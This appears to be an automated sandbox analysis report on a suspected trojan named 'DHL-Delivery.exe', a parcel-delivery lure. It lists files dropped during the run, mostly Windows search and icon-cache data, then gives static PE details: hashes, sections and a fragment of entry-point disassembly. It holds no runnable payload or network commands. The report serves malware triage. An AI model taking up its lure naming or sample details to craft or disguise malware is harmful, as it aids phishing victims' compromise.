                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1096298036180372
                      Encrypted:false
                      SSDEEP:768:Xmmmmmmmmmmmmmmmmmmmmmmmmmmhh666ef6S2GSS2GSR9xNh4bX78XEq5P/t4p81:W
                      MD5:A62D519BE58C4EC079CD825E04C1F4BF
                      SHA1:91C59FF74E1911D942CDB7A68EBBA42F10DC3510
                      SHA-256:9AF30E079CC36BDF17FB5FFFEBBE68B2275616F9513B07E99F15F7065A2D99C6
                      SHA-512:637A0DCED1A940AF17C47ABCDF30DC1A2AB2C1A1F70B9199789670398E87D2C9AD445F82E05FD1EA84CCCFB62D25C8253218426C1FD9784B14DD5C7BAE881B69
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.2553718606106505
                      Encrypted:false
                      SSDEEP:768:mb4daw1rifFiUq1pcWpeFpQnfRpfjCMZHTu7954CM:WsC9
                      MD5:3B6A6056910488C2F2D94B954B66C6F9
                      SHA1:20D828CB53770F094D149754BFBD789E943033DB
                      SHA-256:F5BC1C0213F8DC696862E7BE83CA71C1FEC3A62EBC979E8D33D7613E49AEDFC8
                      SHA-512:49607F2B0C7AEBE9F9BBD01B61BBF6D4A1BCBB8B500BC7C50CB8BD48E3880FABD6FEDF8BDFE6797701D4637850211D66853F01063366DC0E717214AC6925D1EA
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.2553718606106505
                      Encrypted:false
                      SSDEEP:768:mb4daw1rifFiUq1pcWpeFpQnfRpfjCMZHTu7954CM:WsC9
                      MD5:3B6A6056910488C2F2D94B954B66C6F9
                      SHA1:20D828CB53770F094D149754BFBD789E943033DB
                      SHA-256:F5BC1C0213F8DC696862E7BE83CA71C1FEC3A62EBC979E8D33D7613E49AEDFC8
                      SHA-512:49607F2B0C7AEBE9F9BBD01B61BBF6D4A1BCBB8B500BC7C50CB8BD48E3880FABD6FEDF8BDFE6797701D4637850211D66853F01063366DC0E717214AC6925D1EA
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.5907295044118275
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmO0mTGJD9w2KUk/hdJVdNitCef3WpWI35nlRJgTvLDl:pb34j
                      MD5:682F8BB506C58A1E9DFCA38C5EBB8B0B
                      SHA1:A88B8237260041A47057741111278BC2E7EF32D7
                      SHA-256:5F762791DC72986698336D13A708F04AC06D90A1C5B69D828196B1C53C607554
                      SHA-512:8CD54E9EA179123839B0C0755B6611236DE81FBC2C7FE68A87477451A36B9482B1E5686DEE57932E269561DE420206D2B0BAF3EB12C98226A540AC3091CC98C8
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre1_8_0_231_bin_javacpl_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233098316757873
                      Encrypted:false
                      SSDEEP:192:Lph8tFOXKFOgFOBODOR5OIO5AOYj0T3lYERVSnnnn8pF0EIGcrx4+WiNLN2+xpSK:LT10TjVSnnnn8pc5b4
                      MD5:3CCC6610ECF9EB036FC50FDA1F781D21
                      SHA1:DE7DB115B3BD1B926AE0B2A795E7D0FEAC621851
                      SHA-256:2192613BBCF96DD824A813B59C598C486EA713A05C82FB1184EB955BC3B84839
                      SHA-512:AA3A6D68415FC17695A8DC35271617834A84B3485AF974CF34F2FF2A065AB6217DB4A19E08ABD22330DEA9D9A44963E0AA70FEDA061DB2CA6C0C29B2F4C6CA42
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.159960702416083
                      Encrypted:false
                      SSDEEP:768:vKr/VVPqdA9R222vZ5jYp3vlD5hiLYhEDXfx:vXU5ZEDXfx
                      MD5:94B56D65A8B7F7253AEACAC345D4B096
                      SHA1:7E11E248AE804D3647479A4FE5F03835A1EEE4BC
                      SHA-256:0F312587A999305794730DA6F2198C82A346E64211E2FB054256102AC70315BE
                      SHA-512:538CC0C1B4DC66E8A3C6CA9A17DDAC128441874248589BCC6C88B64AD7D3B93FF143867D6FAD0002CBB4584E951D0E82441C350396E6D59B73207A3FFE0FC055
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.954813670123038
                      Encrypted:false
                      SSDEEP:768:fzheYQ/OnxvOSp4eCYapPYJ5OUVmdCZh3qZACZc7:fvQ/Onxvzp4eCvwOQ7
                      MD5:6F0D8710C462B5955D9D16745BDB1BFD
                      SHA1:ED0545934A28799EF27DDDCC0439D05DC40C47AC
                      SHA-256:342F29784A85F25EC119D85E39267EC57A4C803FBC099F6C5CEB7761F8896CFD
                      SHA-512:404085314A3CF37E8E66AECD314D63EA9711D05C1ECB714D531126E61B7BB9929E59E4A42CB736DDADE1AC416D76477881D18B428BFD603FEDE3E9EEB7B6F8CB
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................................................................................................................................................................................................................................ss\.og_ ........................................................................................................................................................................................................................................................................................................................................................................qqU.qk`-sk_.yqf.zrf.t...w.mmm...............................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.7485129788496976
                      Encrypted:false
                      SSDEEP:96:Xea3yOWkJHbYfzJyRl5DJwLG4stxQSNySMg24SqXVjg6rxwj097:1pxT5yJstxlyH1Ag6r
                      MD5:F7D39503EE83519A810CFE794E287514
                      SHA1:8A7580A57E3470B208038E44755718422154F5AA
                      SHA-256:360905ADC4E1D0F05F9E461056B18AAAA986702A6E22305E9E5DA4B9048ECB01
                      SHA-512:53ABA75813912F04A9F067A984D16B6DBA8D5B3D5CA719829017B36372B56E634DFC883747E537E2B8B4C2D53AFDEC974CCD7196536AF250311464D6642A5406
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.0.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):18741
                      Entropy (8bit):4.5321861324934565
                      Encrypted:false
                      SSDEEP:384:q5m7vHOB17A8YapChANVg3dGajuMAH3g5:IaS17AjANVgw9H3+
                      MD5:643CA44B0B53A574B69F5817980E57D8
                      SHA1:0BA65ADFBEF9F724530736808EECD8036D56908A
                      SHA-256:95DAC8017CCDB48DEB8219CDEC0CACA0D75C8E18E140C0EBB9A4A0B035EFE4E5
                      SHA-512:378F3D3FBE3BBE0C671D7807F5E8327D438176623C7C694D3AB287D9EFF7A2CD16A7030B44EAAD59B752A069C1F58F343A4E4CC48986F205E2601E77C4358042
                      Malicious:false
                      Preview: 0.0.....~.......~....~....~.....~.....~......~.....~.....~.......~.......~......~.....~......~.....~......~......~.......~..zune~..your phone~..y computer~..xontrol~..xnip~..xmd~..xcmd~..xbox video~..xbox music~..xbox game bar~..xbox console companion~..xalc~..x86)~..x64)~..wp~..worpad~..world pad~..workpad~..worf~..word~..wordpd~..wordpas~..wordpad~..word[~..word'~..word processor~..word processing~..word pad~..wodpad~..wmv~..wmplayer~..with advanced security~..winword~..windowsmedia~..windows voice recorder~..windows version~..windows speech recognition~..windows shell~..windows setting~..windows security~..windows scan~..windows powershell~..windows powershell ise~..windows powershell ise (x86)~..windows powershell (x86)~..windows power shell~..windows player~..windows photo~..windows paint~..windows mi~..windows memory diagnostic~..windows media player~..windows medai~..windows mea~..windows md~..windows maps~..win
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.1.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:3:Dy:W
                      MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                      SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                      SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                      SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                      Malicious:false
                      Preview: 0.1..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.2.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:3:Ay:Ay
                      MD5:C204E9FAAF8565AD333828BEFF2D786E
                      SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                      SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                      SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                      Malicious:false
                      Preview: 0.2..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\Apps.ft
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):25194
                      Entropy (8bit):3.6998068186858943
                      Encrypted:false
                      SSDEEP:768:O8At5YdO2R8l+TWLDxaibfyBfEK2k4RmA2yd:O8At5YdO2R8l+TGDxaibfyBfBGRmA2yd
                      MD5:7E2D3A342715254046D48222D743AF9A
                      SHA1:3784285FB14F57C2E07DCC6B7A538068DE405C62
                      SHA-256:3B518ED0C6CA216DD846849607B7C2D17FAC73E5707CB8A8080AC38F8EFB92D7
                      SHA-512:E5DA0D2C34B5F71DFA79AD6C579A7D7D46E84CE419BF502A092671C0AC41145C9116656AC6CE7E707439A3656420E0E36A73657C22E8B34B9925C073823B5B53
                      Malicious:false
                      Preview: ........Kb......h...."cmd"~........A%..*.mov~.........+r~........A.#.2016~........A35A60A[.Aa..bX.Ac..dL..e...f+..g'..h..Ai..java..Ak?Al.Am..n9..o...p...quick..Ar#.s,..t...u..Avy.wr..x..Ay..zune~........A.*C..(B..A..A.K./Cpre..run%~.........fetch%~........Ac..msc~.........run~.........md~.........om~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~.........aint~.........paint~........Ebout 4Ac%AdCAl.An.Ap?.rt~.........ssist~........Iua.java~........Mmy co..mputer~.........al~.........lc~........Jro.Gbat rea..rd32~.........der dc~.........apter~.........b~........Ad-Eminis.Cobe.Jva.Cres..~.........s book~........Otrative.. tools~......... reade~........Onced se..curity~........Aa.Dl seMIr..em~.........m~........Ir..,~........Im.. clock~........Ks &.. clock~.........ttings~.........am~.........m~........Bd ..ipping~........Bop..scan~........Otimize ..drives~.........int~........Ip..dat~........Gearance/.li~.........vlp~........O and pe.Orsonali..zation~........E3info.
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\Apps.index
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):136345
                      Entropy (8bit):4.133420633582902
                      Encrypted:false
                      SSDEEP:1536:brdY3K95j0F/keRjndDnlUyxE+FFK9NPx:bruGj4HCMyR
                      MD5:9D1E2EC561F104392DA3E061D639D7D7
                      SHA1:81B31C09DF5082C9D092FC7CC72E9F19658AD74E
                      SHA-256:5B9174D1BF38E33BDBBDB198A3A235AE927CB1049F7DAC87D7BFACAF8EDD9CAE
                      SHA-512:BF96439CCCE12BC73631436C5902F19F5995EC51F15EDD3E90F3775FAC2D36B0E855F27E155283BDE36F29D77A06098121AA0C30C327BA65452233303BEBC53C
                      Malicious:false
                      Preview: Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling..Qh...K........~<~i.PF.Ae.A<.Au.Aa.Ab.Ac.Ad.Af.Ag.Ah.Ai.Aj.Ak.Al.Am.An.Ao.Ap.Aq.Ar.As.At.Av.Aw.Ax.Ay.Az.b;<....=<.?<B@<.B[<..\<.(<.^<._<.`<. <B!<.B"<.B#<.B]<..$<.%<.&<B'<..)<.+<B,<..-<B.<../<B0<.B1<.B2<.B3<.B4<..:<B5<.B6<.B7<.B8<.B9<..{<.}<.~<A<..a<ae.b<be.c<ce.d<de.f<fe.g<ge.h<he.i<ie.j<je.k<ke.l<le.m<me.n<ne.o<oe.p<pe.q<qe.r<re.s<se.t<te.u<ue.v<ve.w<we.x<xe.y<ye.z<ze..a.b.c.d.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.a.w.c.d.e.f.h.g.i.j.k.l.m.n.o.p.q.r.s.t.u.b.v.x.y.z! ..A!zA".A#..$.%A'..(.).+A,..-A.../.:A;..=.?A@.A[.A]..^._.`.&.\.{.}.~....................A<..a<au.b<bu.c<cu.d<du.e<eu.f<fu.g<gu.h<hu.i<iu.j<ju.k<ku.l<lu.m<mu.n<nu.o<ou.p<pu.q<qu.r<ru.s<su.t<tu.v<vu.w<wu.x<xu.y<yu.z<zu..a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.v.w.x.y.zA<..b<ba.c<ca.d<da.e<ea.f<fa.g<ga.h<ha.i<ia.j<ja.k<ka.l<la.m<ma.n<na.o<oa.p<pa.q<qa.r<ra.s<sa.t<ta.u<ua.v<va.w<wa.x<xa.y<ya.z<za..b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.zA<..a<a
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132543128314520433.txt.~tmp
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):109946
                      Entropy (8bit):5.18491162245141
                      Encrypted:false
                      SSDEEP:384:aU/gT2/Hb/jI/Zk/EB/r0E/fX/NV/Cz1/To/Yd/eW/r0g/io/LJ/wIj/va2lO/3P:ocizouSSu/9NSrij5kgE+Y
                      MD5:7BD1ED0B3E7C4D2BF8EDE95216C6D42D
                      SHA1:A99796B8E843F914A4962C9C78B39CAFD99D02BB
                      SHA-256:DDBA552761B286BC9FA56FDFEAABE399B05B220088CF8BC9D60E0E780557CDB9
                      SHA-512:DB1CEC56AB50B4D4CCF937B4C50490463773475CAF55A1A7768BBE7C985187DE636024140E802F9AD6E6777FD5CC9B4AAB4B9E5A3F11533AAEC1569F829CF053
                      Malicious:false
                      Preview: [{"System.FileExtension":{"Value":".com/","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"unknown","Type":12},"System.ParsingName":{"Value":"https://java.com/","Type":12},"System.Software.TimesUsed":{"Value":0,"Type":5},"System.Tile.Background":{"Value":16777215,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"java","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":0,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"https://java.com/","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Visit Java.com","Type":12}},{"System.FileExtension":{"Value":".com/help","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"S

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):5.610322387858801
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.15%
                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL-Delivery.exe
                      File size:81920
                      MD5:12ba338de35e611aef4461c94713a0ff
                      SHA1:63257aadcfe91fb0556d60cb6af265851e9991d5
                      SHA256:f5e9a63f2238667200b4f015774742db6c4cd71cd109877249f53403da2c1da0
                      SHA512:6d9d68f203a74f97ff90e3a5b3513dff1cb486a85c2adb30995bdc4e175488e8a963ee8571815149fa4a118dd2c58207eae4f92a2fc24d26a07f578622e31e21
                      SSDEEP:768:8KdOAgSZRdBb/q+yVn/QCHO5jj8ZXzeL3KX8r+Oa3:ZzZHd/w/bO5jkXCLaXlOa
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....HR..................... ......P........ ....@

                      File Icon

                      Icon Hash:20047c7c70f0e004

                      Static PE Info

                      General

                      Entrypoint:0x401350
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x5248D0F8 [Mon Sep 30 01:16:40 2013 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:1aca61efaa2b91c0a5aa52ef07ed6795

                      Entrypoint Preview

                      Instruction
                      push 0040E0B0h
                      call 00007FBA20E01CE5h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      cmp byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      inc esp
                      mov dh, D2h
                      jmp far 9DBFh : 4F0955AAh
                      cmc
                      pop edi
                      jmp far 0000h : 00965332h
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [ecx+00h], al
                      xchg byte ptr [eax-7Eh], dl
                      add dword ptr [eax+79h], ecx
                      jo 00007FBA20E01D61h
                      arpl word ptr [edx+33h], si
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add bh, bh
                      int3
                      xor dword ptr [eax], eax
                      or esi, ecx
                      leave
                      mov dword ptr [2CC2E758h], eax
                      dec ecx
                      lodsb
                      xor eax, 837AE492h
                      adc dword ptr [ebx-63h], edx
                      cmp dword ptr [edi+eax], edx
                      retf A2FEh
                      inc edi
                      nop
                      lds eax, fword ptr [ebp+13D53D59h]
                      and eax, 33AD4F3Ah
                      cdq
                      iretw
                      adc dword ptr [edi+00AA000Ch], esi
                      pushad
                      rcl dword ptr [ebx+00000000h], cl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xchg bl, cl
                      add byte ptr [eax], al
                      inc edx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [ecx+6Eh], ch
                      jo 00007FBA20E01D65h
                      add byte ptr [43000701h], cl
                      push 666B6375h
                      xor dword ptr [eax], eax
                      sbb dword ptr [ecx], eax
                      add byte ptr [edx+00h], al
                      and al, byte ptr [ecx]
                      and al, 07h

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x112040x28.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000xa00.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x104.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x106a00x11000False0.444134880515data6.06104625011IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .data0x120000xba00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x130000xa000x1000False0.189697265625data2.23086788863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

